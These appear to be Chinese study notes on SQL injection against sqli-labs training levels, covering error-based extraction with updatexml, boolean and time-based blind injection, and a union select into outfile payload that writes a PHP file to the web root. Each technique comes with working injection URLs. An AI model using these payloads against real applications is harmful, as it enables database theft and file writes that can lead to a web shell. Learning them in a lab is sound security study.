updatexml函数
select updatexml(1,concat(0x7e,(select database()),0x7e),1) 利用语法报错,在中间要替换的信息里输入错误的语法字符,这样报错的时候就会把错误语法字符包含的信息以报错的形式报出
http://10.1.2.5:10631/sqli/Less-3/?id=1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) %23
布尔盲注
substr(参数,1,1) 代表参数的第一位是什么
select ascii(substr(database(),1,1)) > 1 通过判断真假确定ascii的取值范围
http://10.1.2.5:10631/sqli/Less-8/?id=1' and length(database())=8%23
时间型盲注
利用sleep()函数判断是什么漏洞的注入
select if (1,sleep(2),1) 如果条件成立休眠两秒输出1
http://10.1.2.5:10631/sqli/Less-10/?id=1" and if(ascii(substr(current_user(),1,1))>1,sleep(5),1) %23 查询当前页面的用户名首字母的ASCII码
http://10.1.2.5:10631/sqli/Less-7/?id=1')) union select 'w','o','w' into outfile 'c:\www\llufei.php' %23 向目录写入文件 可以穿字符串